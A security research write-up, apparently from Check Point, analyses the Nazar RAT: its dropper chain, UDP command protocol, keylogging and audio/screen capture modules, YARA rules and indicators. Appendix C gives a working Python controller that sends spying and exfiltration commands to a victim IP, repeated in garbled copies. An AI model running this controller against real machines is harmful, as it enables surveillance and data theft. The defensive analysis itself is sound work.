{
	"id": "e5dec0f8-1c38-418c-8a3a-14a2ffec5cc0",
	"created_at": "2026-04-11T02:23:19.338309Z",
	"updated_at": "2026-04-11T02:24:15.639301Z",
	"deleted_at": null,
	"sha1_hash": "86864f605f7035b4d98342f0087a70ea42f42a7f",
	"title": "Nazar: Spirits of the Past",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 175242,
	"plain_text": "Nazar: Spirits of the Past\r\nBy itayc\r\nPublished: 2020-05-05 · Archived: 2026-04-11 02:05:33 UTC\r\nIntroduction\r\n6:22 AM 11/7/2012 conficker still on target\r\n6:18 AM 11/7/2012 checking logs - we are clean\r\n8:16 PM 7/2/2012 - BOOM!, got the callback\r\nThose were some of the words that the Equation Group (NSA) operators left in the records documenting their\r\nattacks against target systems, and which were later leaked by the Shadow Brokers. The plethora of information\r\nexposed in the fifth and last leak by the Shadow Brokers, called “Lost in Translation”, and the consequences that\r\nfollowed in the shape of WannaCry and NotPetya, among other things, make this a turning point in the\r\ngame of cyber security as we know it.\r\nRecently, security researcher Juan Andres Guerrero-Saade revealed a previously misidentified and unknown threat\r\ngroup, called Nazar, which was part of the last leak by the Shadow Brokers. In this research, we will expand upon\r\nthe analysis done by Juan and another which was written by Maciej Kotowicz, and will provide an in-depth\r\nanalysis of each of the Nazar components. 
But the real question is, do those new revelations add a missing piece\r\nto the puzzle, or do they show us how much of the puzzle we are missing?\r\nPrior Knowledge\r\nWhile the “Lost in Translation” leak by the Shadow Brokers brought infamous exploits such as EternalBlue into\r\nthe limelight, it contained many more valuable components that showed some of the possible precautions taken by\r\nthe Equation Group operators before launching an attack.\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 1 of 28\n\nA screenshot from the original post by the Shadow Brokers\r\nFor example, among the leaked files was one called “drv_list.txt“, which included a list of driver names and\r\ncorresponding remarks that were sent back to the operators if the drivers were found on the target system.\r\nNaturally, the list contained many drivers that could detect the presence of an anti-virus product or a security\r\nsolution (ourselves included):\r\nDrivers mentioned in “drv_list.txt”\r\nBut even more curious were the names of malicious drivers in this list, which if found could indicate that the\r\ntarget system has already been compromised by another attacker, and would then warn the operators to “pull\r\nback”. Another pivotal component in the Equation Group’s arsenal that is in charge of such checks is called\r\n“Territorial Dispute”, or “TeDi”.\r\nTerritorial Dispute, as seen in the leaked sources\r\nSimilar to a scan conducted by a security product, “TeDi” consists of 45 signatures that are used to search the\r\ntarget system for registry keys or filenames associated with other threat groups. 
But we can assume that the end\r\npurpose in this case, unlike that of a security scan, is to make sure that Equation Group’s operations are not\r\ndisrupted and that their own tools are not detected by other adversaries (or “other peeps”, as they are called in\r\n“TeDi”) monitoring the same system.\r\nCode snippet from TeDi’s leaked sources\r\nIn certain cases, this also guarantees that the Equation Group themselves do not disrupt the ongoing operations of\r\n“friendly” threat groups, and do not attack the same target.\r\nExtensive research work was done by CrySys Labs in 2018 to try and map each of the 45 signatures to the\r\nrespective threat group it is meant to detect, since no names were included in “TeDi” itself.\r\nExamples of signatures found in TeDi’s leaked sources\r\nDespite the relatively scarce amount of information it contains, security researchers often revisit “TeDi” in an\r\nattempt to get a better understanding of the threat groups that the Equation Group had visibility into back then, some\r\nof which are still unknown to the public to this day.\r\nSecurity researcher Juan Andres Guerrero-Saade has shown that the 37th signature in “TeDi”, which looks for a\r\nfile called “Godown.dll”, points to what might be an Iranian threat group he dubbed “Nazar”, rather than a Chinese\r\none as initially thought in the CrySys Lab report.\r\nSIG37, the signature to detect “Nazar” by looking for “godown.dll”\r\nThe beauty of the “TeDi” project is perhaps in its minimalism: the small number of signatures it contained gave\r\nthe Equation Group the capability of detecting the activity of notorious threat groups that have eluded detection\r\nand managed to remain in the shadows for years: Turla, Duqu, Dark Hotel, and the list goes on. This is the result\r\nof what we can only estimate as years of intelligence and research work on the Equation Group’s part. 
Equipped\r\nwith this knowledge we set out to find out more about the mysterious newly discovered player included in this\r\nwatchlist: Nazar.\r\nExecution Flow\r\nNazar’s activity is believed to have started somewhere around 2008, meaning that the group was active for at least\r\nfour years, as the latest samples were created in 2012.\r\nThe CrySys Labs report pointed to a file possibly related to the 37th signature, which turned out to be an anti-virus\r\nsignature database from 2015 that detected this unique Nazar artifact, “Godown.dll”. Surprisingly, the same\r\nsignature contained the names of the other artifacts that we have seen being used by the Nazar malware (and will\r\nexplain in detail in the following sections), meaning that some security companies were already fully aware of this\r\nmalicious activity back then, prior to the “TeDi” leak:\r\nAn anti-virus signature that was detecting Nazar\r\nThe initial binary that is executed in Nazar’s flow is gpUpdates.exe. It is a Self-Extracting Archive (SFX)\r\ncreated by a program called “Zip 2 Secure EXE”. Upon execution, gpUpdates writes three files to disk:\r\nData.bin, info, and Distribute.exe. Then, gpUpdates.exe will start Distribute.exe, which operates as\r\nan installing component.\r\nDistribute.exe\r\nAt the start, Distribute.exe will read the other two files that were dropped by gpUpdates: info and\r\nData.bin. The Data.bin file is a binary blob that contains multiple PE files that are concatenated in a\r\nsequence. The info file is a very small file that contains a simple struct with the lengths of the PE files in\r\nData.bin. 
Distribute.exe will read Data.bin as a stream, file by file, in the order of the file lengths listed in\r\ninfo.\r\nThe following table shows the files concatenated in Data.bin against the lengths written in info.\r\nData.bin (sequence of files) info (lengths)\r\nsvchost.exe 213504\r\nFilesystem.dll 262219\r\nViewScreen.dll 196608\r\nlame_enc.dll 162304\r\nhodll.dll 57344\r\nGodown.dll 32768\r\nAfter the aforementioned files are dropped to the disk, Distribute.exe will register 3 of the DLL files in the\r\nregistry by using regsvr32:\r\nShellExecuteA(0, \"open\", \"regsvr32.exe\", \"Godown.dll -s\", 0, 0);\r\nShellExecuteA(0, \"open\", \"regsvr32.exe\", \"ViewScreen.dll -s\", 0, 0);\r\nShellExecuteA(0, \"open\", \"regsvr32.exe\", \"Filesystem.dll -s\", 0, 0);\r\nAfterwards, it uses CreateServiceA to add svchost.exe as a service named “EYService”, and it will then start\r\nthe service and exit. This service, as we will explain soon, is the core component in the flow and is responsible for\r\nprocessing the commands sent by the attacker.\r\nNazar’s execution flow\r\nsvchost.exe / EYService\r\nThis service is the main component in the attack, and it orchestrates all the modules dropped and loaded by\r\nNazar. 
In a sense, the EYService is only a marionette controlled by a puppeteer that sends commands to it. The\r\ncommunication protocol will be thoroughly explained in later parts of this blog post. As commonly seen in RAT-like components, this service mainly contains a list of supported commands, and each of these commands is\r\nassigned a function to handle it upon a request from the attacker. The full list of commands is given below.\r\nLike the other components in Nazar, this module does not demonstrate novel techniques or high-quality\r\ncode. In fact, this module, like the others, is mostly based on open-source libraries that were commonly available\r\nat the time. To manage traffic and sniff packets, Nazar uses Microolap’s Packet Sniffer SDK. To record the\r\nvictim’s microphone it uses the “Lame” MP3 encoding library. For keylogging it uses KeyDLL3. BMGLib is used to\r\ntake screenshots, and even for shutting down the computer it uses an open-source project, The ShutDown Alarm.\r\nCommunication\r\nWhen analyzing the networking component, the main thing we looked for was the IP of the command and control,\r\nsince this could open up new paths, and perhaps recent attacks and samples. Alas, even after leaving no stone unturned, we\r\ncould not find such an IP, which makes sense given how Nazar communicates.\r\nUpon execution of the service, it begins by setting up the packet sniffing. This is done by using the Packet\r\nSniffer SDK, in pretty much a textbook way. 
The main thread gets an outward-facing network adapter and uses\r\nBPF to make sure only UDP packets are forwarded to the handler.\r\nDWORD __stdcall main_thread(LPVOID lpThreadParameter)\r\n{\r\n  HANDLE hMgr; // edi\r\n  HANDLE hCfg; // esi\r\n  HANDLE hFtr; // edi\r\n  hMgr = MgrCreate();\r\n  MgrInitialize(hMgr);\r\n  hCfg = MgrGetFirstAdapterCfg(hMgr);\r\n  do\r\n  {\r\n    if ( !AdpCfgGetAccessibleState(hCfg) )\r\n      break;\r\n    hCfg = MgrGetNextAdapterCfg(hMgr, hCfg);\r\n  }\r\n  while ( hCfg );\r\n  ADP_struct = AdpCreate();\r\n  AdpSetConfig(ADP_struct, hCfg);\r\n  if ( !AdpOpenAdapter(ADP_struct) )\r\n  {\r\n    AdpGetConnectStatus(ADP_struct);\r\n    MaxPacketSize = AdpCfgGetMaxPacketSize(hCfg);\r\n    adapter_ip = AdpCfgGetIpA_wrapper(hCfg, 0);\r\n    AdpCfgGetMACAddress(hCfg, \u0026mac_address, 6);\r\n    hFtr = BpfCreate();\r\n    BpfAddCmd(hFtr, BPF_LD_B_ABS, 23u); // Get Protocol field value\r\n    BpfAddJmp(hFtr, BPF_JMP_JEQ, IPPROTO_UDP, 0, 1); // Protocol == UDP\r\n    BpfAddCmd(hFtr, BPF_RET, 0xFFFFFFFF);\r\n    BpfAddCmd(hFtr, BPF_RET, 0);\r\n    AdpSetUserFilter(ADP_struct, hFtr);\r\n    AdpSetUserFilterActive(ADP_struct, 1);\r\n    AdpSetOnPacketRecv(ADP_struct, on_packet_recv_handler, 0);\r\n    AdpSetMacFilter(ADP_struct, 2);\r\n    while ( 1 )\r\n    {\r\n      if ( stop_and_ping == 1 )\r\n      {\r\n        adapter_ip = AdpCfgGetIpA_wrapper(hCfg, 0);\r\n        connection_method(2);\r\n        stop_and_ping = 0;\r\n      }\r\n      Sleep(1000u);\r\n    }\r\n  }\r\n  return 0;\r\n}\r\nWhenever a UDP packet arrives, its source IP is recorded to be used in the next response, whether or not there will\r\nbe a response. Then, the packet’s destination port is checked, and if it is 1234 the UDP data is\r\nforwarded to the command dispatcher.\r\nint __cdecl commandMethodsWrapper(udp_t *udp_packet, int zero, char *src_ip, int ip_id)\r\n{\r\n  int length; // edi\r\n  length = HIBYTE(udp_packet-\u003elength) - 8;\r\n  ntohs(udp_packet-\u003esrc_port);\r\n  if ( ntohs(udp_packet-\u003edst_port) != 1234 )\r\n    return 0;\r\n  commandDispatcher(\u0026udp_packet[1], src_ip, ip_id, length);\r\n  return 1;\r\n}\r\nTypes of responses\r\nEach response has its packet built from scratch, so that it can be sent using PSSDK’s send methods:\r\nAdpAsyncSend/AdpSyncSend\r\nThere are 3 types of responses:\r\nSend an ACK: With destination port 4000 and payload 101;0000\r\nSend computer information: With destination port 4000 and 
payload 100;\u003cComputer Name\u003e;\u003cOS name\u003e\r\nSend a file: The content will be sent as UDP data, followed by another packet with ---\u003csize_of_file\u003e\r\nThe UDP destination port will be the little-endian value of the IP identification field in the request\r\nmessage. For example, if the server sent a packet (to destination port 1234) with identification 0x3456,\r\nthe malware will send its response with destination port 0x5634.\r\nTo make the options clearer, and to demonstrate how Nazar communicates, we have created a Python script that\r\ncan “play” the server controlled by the attacker and communicate with the victim. The script is available in\r\nAppendix C.\r\nA script we created to demonstrate how the server would communicate with Nazar\r\nSupported Commands\r\nAs we mentioned earlier, svchost.exe, or the service named EYService, contains a list of supported\r\ncommands. We analyzed two versions of the RAT and found slight differences. The entire list of supported\r\ncommands, in addition to our analysis notes, is presented in the table below.\r\nCommand ID | Description\r\n311 | Enable the keylogger by loading the ‘hodll.dll’ library into memory and manually importing the ‘installhook’ function. The keystrokes are saved together with the window name to ‘report.txt’. The written content is then sent to the server. The keylogger is based on common open-source libraries called “KeyDLL3” (by Anoop Thomas) and “KeyBoard Hooks” (by H. Joseph). Command 312 will disable the keylogger.\r\n139 | Shut down the machine. The command interacts with the Godown.dll component by spawning it based on its RCLSID and RIID. The Godown module was probably based on an open-source implementation called The ShutDown Alarm.\r\n189 | Start screen capturing. The function calls the benign ViewScreen.dll and instructs it to save screenshots in a PNG file named z.png. The file is then sent to the server. The module is based on a known open-source project named “BMGLib”, written by M. Scott Heiman. Command 313 will disable the screen capturing.\r\n119 | Record audio using the victim’s microphone. The recording is saved to music.mp3 and sent to the server. The implementation is based on an open-source project which uses a known open-source library called “LAME MP3”. Command 315 will disable the voice recording.\r\n199 | List all drives on the PC (C:\\, D:\\, …) and save the list to Drives.txt. The file is then sent to the server. This functionality exists as-is in Filesystem.dll, but the newer variant of svchost.exe does not use the DLL, even though it is still dropped to the machine.\r\n200 | List all the files and folders in the system and save the list to Files.txt. Files and folders are separated with ;File; or ;Folder;. This functionality exists as-is in Filesystem.dll, but the newer variant of svchost.exe does not use the DLL, even though it is still dropped to the machine.\r\n201 | Send file content to the server.\r\n209 | Remove a file from the machine.\r\n499 | List programs by enumerating the keys found in the following registry path: Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall. The program names are then saved to a file called Programs.txt and sent to the server.\r\n599 | List all the devices on the machine and save the list to a file named ‘Devices.txt’, which is then sent to the server. The devices are separated with either ‘;Root;’ or ‘;Child;’.\r\n999 | Send 101;0000 back to the server on port 4000.\r\n555 | Send computer information: 100;Computer Name; OS Name back to the server on port 4000.\r\n315 | Disable voice recording.\r\n312 | Disable keylogging.\r\n313 | Disable screen capturing.\r\n666 | Pretty much a NOP. Sets a flag that is also set by 119 and 189 and is unset when sending a file. However, the flag is never checked.\r\n211 | Registers Godown.dll using regsvr32. This command was included in svchost.exe versions from 2010 but was then removed, and the module registration moved to Distribute.exe.\r\n212 | Registers ViewScreen.dll using regsvr32. This command was included in svchost.exe versions from 2010 but was then removed, and the module registration moved to Distribute.exe.\r\n213 | Registers Filesystem.dll using regsvr32. This command was included in svchost.exe versions from 2010 but was then removed, and the module registration moved to Distribute.exe.\r\nGodown.dll\r\nGodown.dll is the DLL which is in the spotlight of SIG37, and the one that started this manhunt after the\r\nunknown malware. Before it was caught by law-abiding security analysts, one could imagine Godown.dll to be\r\nthe mastermind behind this whole operation, the component to control them all, some hidden gem, or an unseen\r\nrose. In reality, Godown.dll is a tiny DLL with one and only goal – to shut down the computer. Believe us, we\r\ntried hard to find any hidden or mysterious functionality inside the binary, but nothing was there, except a\r\nshutdown command. 
The reasons for taking 5 lines of C code and placing them in a DLL, putting it in Data.bin, dropping it\r\nto the disk, registering it as a COM DLL using regsvr32 and then calling it indirectly using its GUID are beyond our\r\nunderstanding. But well, it was a good enough lead to reveal Nazar, and for that, we should be thankful.\r\nFilesystem.dll\r\nOut of all the modules used in this attack, Filesystem.dll might be the only one whose code was actually\r\nwritten by the attackers themselves. The purpose of this module is to enumerate drives, folders and files on the\r\ninfected system and write the final results to two text files: Drives.txt and Files.txt.\r\nWe were able to get our hands on two versions of this module that were created a year apart, both of which\r\nincluded PDB paths that mentioned a folder with the Persian name Khzer (or خضر):\r\nC:\\\\khzer\\\\DLLs\\\\DLL's Source\\\\Filesystem\\\\Debug\\\\Filesystem.pdb\r\nD:\\\\Khzer\\\\Client\\\\DLL's Source\\\\Filesystem\\\\Debug\\\\Filesystem.pdb\r\nUpon closer inspection, there are some differences between the two paths: one starts with the C:\\\\ partition\r\nwhile the other starts with D:\\\\, one uses Khzer (uppercase) while the other uses khzer (lowercase), and so\r\non. This might indicate that the two versions of the module were not compiled in the same environment, which is\r\nfurther strengthened by some of the included headers’ paths, which show that Visual Studio was installed in two\r\ndifferent locations:\r\nBut these are not the only differences between the two versions: while the Filesystem.dll module was dropped\r\nby all the known variants of gpUpdates.exe, it was not always used in the same manner.\r\nFor example, versions of svchost.exe dating back to 2010 have three commands that have since been omitted:\r\n“211”, “212”, and “213”. 
Those commands allow svchost.exe to register the dropped DLL modules using\r\nregsvr32, a functionality that was later migrated to Distribute.exe (as described in the Execution Flow\r\nsection above).\r\nAn omitted command presented in svchost.exe, as can be seen in Cutter\r\nThen, when a command is received from the C2 to collect the files and drives on the system, the Filesystem.dll\r\nmodule is called after it was registered:\r\nRegistering Filesystem.dll, as can be seen in Cutter\r\nOn the other hand, a more recent version of svchost.exe that was created in 2012 replicates the file and drive\r\nlookup functionalities found in Filesystem.dll when receiving the “199” and “200” commands from the C2, and\r\nperforms the search itself. Therefore, even though it is still dropped in this case, it appears that the Filesystem.dll\r\nmodule is not used in the newer versions of Nazar:\r\nThe same functionality presented in both files, as can be seen in the disassembly from Cutter\r\nhodll.dll\r\nThe hodll.dll module is responsible for recording the user’s keystrokes. This is done, as most keyloggers do, by\r\nsetting a Windows hook for keyboard input. While there are many implementations of keyloggers available, we\r\nbelieve that this implementation is based on one or more open-source projects. Specifically, we believe that the\r\ncode was taken from common open-source libraries called “KeyDLL3” (by Anoop Thomas) and “KeyBoard\r\nHooks” (by H. Joseph), or from a fork of these projects, as many are available. In fact, the samples of hodll.dll\r\nwe got our hands on looked like they were built from different layers of open-source projects. In a way, it looked\r\nlike someone copied code from the internet, and then deleted it partially, and took other code, and deleted it as\r\nwell, and so on. 
The final result contained evolutionary pieces from multiple layers of code.\r\nViewScreen.dll\r\nThis DLL is based on a known open-source project named “BMGLib” and is used to take screenshots of the\r\nvictim’s computer. No major changes, if any, were made to the original source, and this is yet another example of\r\nhow the Nazar malware uses an entire library just for a small task.\r\nConclusion\r\nIn this article, we tried to gather all the information we learned about Nazar since its recent exposure. We dived\r\ndeep into each and every one of the components and tried to solve as many mysteries as possible. The\r\ninformation leaked by the Shadow Brokers taught us that the NSA knew about Nazar for many years, and thanks to other\r\nresearchers, the community was able to strike another unknown malware family off the list of signatures\r\nin “TeDi”.\r\nMany of the signatures in “TeDi” described advanced and novel malware families, but this does not appear to be\r\nthe case with Nazar. As we have shown in the article, the quality of the code, as well as the heavy usage of open-source\r\nlibraries, does not match the profile of a shrewd threat actor. And although we tried to cover everything,\r\nthere are still many unanswered questions surrounding those discoveries: What happened to the Nazar group? Did\r\nthey evolve into other groups that are nowadays known under different names? Are they still active? Are there\r\nmore samples out there? With those questions and others on our minds, we cannot help but leave this open-ended.\r\nAppendix\r\nAppendix A: Yara Rules\r\nIn his blog post, Juan published Yara rules to ease detection. The rules are well written and cover the different\r\ncomponents. 
We want to share some rules we created during our analysis, to add to the existing rules.\r\nrule apt_nazar_svchost_commands\r\n{\r\n  meta:\r\n    description = \"Detect Nazar's svchost based on supported commands\"\r\n    author = \"Itay Cohen\"\r\n    date = \"2020-04-26\"\r\n    reference = \"\u003chttps://www.epicturla.com/blog/the-lost-nazar\u003e\"\r\n    hash = \"2fe9b76496a9480273357b6d35c012809bfa3ae8976813a7f5f4959402e3fbb6\"\r\n    hash = \"be624acab7dfe6282bbb32b41b10a98b6189ab3a8d9520e7447214a7e5c27728\"\r\n  strings:\r\n    // Each pattern is a run of adjacent null-terminated command-ID strings as laid out in svchost.exe\r\n    $str1 = { 33 31 34 00 36 36 36 00 33 31 33 00 } // \"314\", \"666\", \"313\"\r\n    $str2 = { 33 31 32 00 33 31 35 00 35 35 35 00 } // \"312\", \"315\", \"555\"\r\n    $str3 = { 39 39 39 00 35 39 39 00 34 39 39 00 } // \"999\", \"599\", \"499\"\r\n    $str4 = { 32 30 39 00 32 30 31 00 32 30 30 00 } // \"209\", \"201\", \"200\"\r\n    $str5 = { 31 39 39 00 31 31 39 00 31 38 39 00 31 33 39 00 33 31 31 00 } // \"199\", \"119\", \"189\", \"139\", \"311\"\r\n  condition:\r\n    4 of them\r\n}\r\nrule apt_nazar_component_guids\r\n{\r\n  meta:\r\n    description = \"Detect Nazar Components by COM Objects' GUID\"\r\n    author = \"Itay Cohen\"\r\n    date = \"2020-04-27\"\r\n    reference = \"\u003chttps://www.epicturla.com/blog/the-lost-nazar\u003e\"\r\n    hash = \"1110c3e34b6bbaadc5082fabbdd69f492f3b1480724b879a3df0035ff487fd6f\"\r\n    hash = \"1afe00b54856628d760b711534779da16c69f542ddc1bb835816aa92ed556390\"\r\n    hash = \"2caedd0b2ea45761332a530327f74ca5b1a71301270d1e2e670b7fa34b6f338e\"\r\n    hash = \"2fe9b76496a9480273357b6d35c012809bfa3ae8976813a7f5f4959402e3fbb6\"\r\n    hash = \"460eba344823766fe7c8f13b647b4d5d979ce4041dd5cb4a6d538783d96b2ef8\"\r\n    hash = \"4d0ab3951df93589a874192569cac88f7107f595600e274f52e2b75f68593bca\"\r\n    hash = \"75e4d73252c753cd8e177820eb261cd72fecd7360cc8ec3feeab7bd129c01ff6\"\r\n    hash = \"8fb9a22b20a338d90c7ceb9424d079a61ca7ccb7f78ffb7d74d2f403ae9fbeec\"\r\n    hash = \"967ac245e8429e3b725463a5c4c42fbdf98385ee6f25254e48b9492df21f2d0b\"\r\n    hash = \"be624acab7dfe6282bbb32b41b10a98b6189ab3a8d9520e7447214a7e5c27728\"\r\n    hash = \"d34a996826ea5a028f5b4713c797247913f036ca0063cc4c18d8b04736fa0b65\"\r\n    hash = \"d9801b4da1dbc5264e83029abb93e800d3c9971c650ecc2df5f85bcc10c7bd61\"\r\n    hash = \"eb705459c2b37fba5747c73ce4870497aa1d4de22c97aaea4af38cdc899b51d3\"\r\n  strings:\r\n    // Raw little-endian GUID bytes as they appear in the binaries\r\n    $guid1_godown = { 98 B3 E5 F6 DF E3 6B 49 A2 AD C2 0F EA 30 DB FE } // Godown.dll IID\r\n    $guid2_godown = { 31 4B CB DB B8 21 0F 4A BC 69 0C 3C E3 B6 6D 00 } // Godown.dll CLSID\r\n    $guid3_godown = { AF 94 4E B6 6B D5 B4 48 B1 78 AF 07 23 E7 2A B5 } // probably Godown\r\n    $guid4_filesystem = { 79 27 AB 37 34 F2 9D 4D B3 FB 59 A3 FA CB 8D 60 } // Filesystem.dll CLSID\r\n    $guid6_filesystem = { 2D A1 2B 77 62 8A D3 4D B3 E8 92 DA 70 2E 6F 3D } // Filesystem.dll TypeLib IID\r\n    $guid5_filesystem = { AB D3 13 CF 1C 6A E8 4A A3 74 DE D5 15 5D 6A 88 } // Filesystem.dll\r\n  condition:\r\n    any of them\r\n}\r\n
BC 69 0C 3C E3 B6 6D 00 } // Godown.dll CLSID\r\n $guid3_godown = { AF 94 4E B6 6B D5 B4 48 B1 78 AF 07 23 E7 2A B5 } // probably Godown\r\n $guid4_filesystem = { 79 27 AB 37 34 F2 9D 4D B3 FB 59 A3 FA CB 8D 60 } // Filesystem.dll CLS\r\n $guid6_filesystem = { 2D A1 2B 77 62 8A D3 4D B3 E8 92 DA 70 2E 6F 3D } // Filesystem.dll Typ\r\n $guid5_filesystem = { AB D3 13 CF 1C 6A E8 4A A3 74 DE D5 15 5D 6A 88 } // Filesystem.dll\r\n \r\n condition:\r\n any of them\r\n}\r\nAppendix B: Indication of Compromises\r\nFile Sha-256\r\ngpUpdates.exe\r\n4d0ab3951df93589a874192569cac88f7107f595600e274f52e2b75f68593bca\r\nd34a996826ea5a028f5b4713c797247913f036ca0063cc4c18d8b04736fa0b65\r\neb705459c2b37fba5747c73ce4870497aa1d4de22c97aaea4af38cdc899b51d3\r\nData.bin\r\nd9801b4da1dbc5264e83029abb93e800d3c9971c650ecc2df5f85bcc10c7bd61\r\n75e4d73252c753cd8e177820eb261cd72fecd7360cc8ec3feeab7bd129c01ff6\r\n2caedd0b2ea45761332a530327f74ca5b1a71301270d1e2e670b7fa34b6f338e\r\nDistribute.exe\r\n839c3e6ba65e5d07a2e0c4dd4a2c0d7ae95a266431dd3f8971b8a37d17b1ddf6\r\n6b8ea9a156d495ec089710710ce3f4b1e19251c1d0e5b2c21bbeeab05e7b331f\r\nFilesystem.dll\r\n1afe00b54856628d760b711534779da16c69f542ddc1bb835816aa92ed556390\r\n460eba344823766fe7c8f13b647b4d5d979ce4041dd5cb4a6d538783d96b2ef8\r\n1110c3e34b6bbaadc5082fabbdd69f492f3b1480724b879a3df0035ff487fd6f\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 21 of 28\n\nFile Sha-256\r\nHodll.dll 
0c09fedc5c74f90883cd3256a181d03e4376d13676c1fe266dbd04778a929198\r\nGodown.dll\r\n967ac245e8429e3b725463a5c4c42fbdf98385ee6f25254e48b9492df21f2d0b\r\n8fb9a22b20a338d90c7ceb9424d079a61ca7ccb7f78ffb7d74d2f403ae9fbeec\r\nsvchost.exe\r\n2fe9b76496a9480273357b6d35c012809bfa3ae8976813a7f5f4959402e3fbb6\r\nbe624acab7dfe6282bbb32b41b10a98b6189ab3a8d9520e7447214a7e5c27728\r\nViewScreen.dll\r\n(benign)\r\n5a924dec60c623cf73f5b8505e11512ad85e62ac571a840ab0ff48d4a04b60de\r\npssdk41.sys\r\n(benign)\r\n048208864c793a670159723b38c3ea1474ccc62e06b90833bdf1683b8026e12f\r\nlame_enc.dll\r\n(benign)\r\nc84100d52c09703e32951444bd7ba4e22c5d41193e7420aacbbc1f736f4c4e1f\r\n0091e2101f00751c4020ef8e115cfe12a284c9abacc886f549b40a62574a7510\r\nAppendix C: Python Server\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nfrom scapy.all import *\r\nimport struct\r\nimport socket\r\nimport hexdump\r\nimport argparse\r\nDST_PORT = 1234\r\n# 4000 is the usual port without sending files, but we use it for everything, because why not?\r\nSERVER_PORT = 4000\r\n# We want to make sure the ID has the little endian of it\r\nID = struct.unpack('\u003eH',struct.pack('\u003cH',4000))[0]\r\ndef get_response(sock, should_loop):\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 22 of 28\n\nstarted = False\r\ntotal_payload = b''\r\nwhile(should_loop or not started):\r\ntry:\r\npayload, client_address = sock.recvfrom(4096)\r\nexcept ConnectionResetError:\r\npayload, client_address = sock.recvfrom(4096)\r\ntotal_payload += payload\r\n# Good enough stop condition\r\nif (len(payload) \u003e= 4\r\nand payload[:3] == b'---'\r\nand payload[4] \u003e= ord('0')\r\nand payload[4] \u003c= ord('9')):\r\nshould_loop = False\r\nstarted = True\r\nhexdump.hexdump(total_payload)\r\nMENU = \"\"\"Welcome to NAZAR. 
Please choose:\r\n999 - Get a ping from the victim.\r\n555 - Get information on the victim's machine.\r\n311 - Start keylogging (312 to disable).\r\n139 - Shutdown victim's machine.\r\n189 - Screenshot (313 to disable).\r\n119 - Record audio from Microphone (315 to disable).\r\n199 - List drives.\r\n200 - List recursivley from directory*.\r\n201 - Send a file*.\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 23 of 28\n\n209 - Remove file*.\r\n599 - List devices.\r\n* (append a path, use double-backslashes)\r\nquit to Quit,\r\nhelp for this menu.\r\n\"\"\"\r\ndef get_message():\r\nwhile True:\r\ncurr_message = input('\u003e ').strip()\r\nif 'quit' in curr_message:\r\nreturn None\r\nif 'help' in curr_message:\r\nprint(MENU)\r\nelse:\r\nreturn curr_message\r\ndef get_sock():\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nserver_address = '0.0.0.0'\r\nserver = (server_address, SERVER_PORT)\r\nsock.bind(server)\r\nreturn sock\r\ndef main(ip_addr):\r\nsock = get_sock()\r\nprint(MENU)\r\nmulti_packets = [\"200\",\"201\", \"119\", \"189\", \"311\", \"199\", \"599\"]\r\nsingle_packets = [\"999\", \"555\"]\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 24 of 28\n\nall_commands = single_packets + multi_packets\r\nwhile True:\r\ncurr_message = get_message()\r\nif not curr_message:\r\nbreak\r\n# Send message using scapy\r\n# Make sure the IP identification field is little endian of the port.\r\nsr1(\r\nIP(dst=ip_addr, id=ID)/\r\nUDP(sport=SERVER_PORT,dport=1234)/\r\nRaw(load=curr_message),\r\nverbose=0\r\n)\r\ncommand = curr_message[:3]\r\nif command not in all_commands:\r\ncontinue\r\nshould_loop = command in multi_packets\r\nget_response(sock, should_loop)\r\nif __name__ == '__main__':\r\nparser = argparse.ArgumentParser(description=\"victim's IP\")\r\nparser.add_argument('ip')\r\nargs = parser.parse_args()\r\nmain(args.ip)\r\nfrom scapy.all import * import struct import socket import hexdump import 
argparse DST_PORT = 1234 # 4000\r\nis the usual port without sending files, but we use it for everything, because why not? SERVER_PORT = 4000 #\r\nWe want to make sure the ID has the little endian of it ID = struct.unpack('\u003eH',struct.pack('\u003cH',4000))[0] def\r\nget_response(sock, should_loop): started = False total_payload = b'' while(should_loop or not started): try:\r\npayload, client_address = sock.recvfrom(4096) except ConnectionResetError: payload, client_address =\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 25 of 28\n\nsock.recvfrom(4096) total_payload += payload # Good enough stop condition if (len(payload) \u003e= 4 and\r\npayload[:3] == b'---' and payload[4] \u003e= ord('0') and payload[4] \u003c= ord('9')): should_loop = False started = True\r\nhexdump.hexdump(total_payload) MENU = \"\"\"Welcome to NAZAR. Please choose: 999 - Get a ping from the\r\nvictim. 555 - Get information on the victim's machine. 311 - Start keylogging (312 to disable). 139 - Shutdown\r\nvictim's machine. 189 - Screenshot (313 to disable). 119 - Record audio from Microphone (315 to disable). 199 -\r\nList drives. 200 - List recursivley from directory*. 201 - Send a file*. 209 - Remove file*. 599 - List devices. *\r\n(append a path, use double-backslashes) quit to Quit, help for this menu. 
\"\"\" def get_message(): while True:\r\ncurr_message = input('\u003e ').strip() if 'quit' in curr_message: return None if 'help' in curr_message: print(MENU)\r\nelse: return curr_message def get_sock(): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nserver_address = '0.0.0.0' server = (server_address, SERVER_PORT) sock.bind(server) return sock def\r\nmain(ip_addr): sock = get_sock() print(MENU) multi_packets = [\"200\",\"201\", \"119\", \"189\", \"311\", \"199\", \"599\"]\r\nsingle_packets = [\"999\", \"555\"] all_commands = single_packets + multi_packets while True: curr_message =\r\nget_message() if not curr_message: break # Send message using scapy # Make sure the IP identification field is\r\nlittle endian of the port. sr1( IP(dst=ip_addr, id=ID)/ UDP(sport=SERVER_PORT,dport=1234)/\r\nRaw(load=curr_message), verbose=0 ) command = curr_message[:3] if command not in all_commands: continue\r\nshould_loop = command in multi_packets get_response(sock, should_loop) if __name__ == '__main__': parser =\r\nargparse.ArgumentParser(description=\"victim's IP\") parser.add_argument('ip') args = parser.parse_args()\r\nmain(args.ip)\r\nfrom scapy.all import *\r\nimport struct\r\nimport socket\r\nimport hexdump\r\nimport argparse\r\nDST_PORT 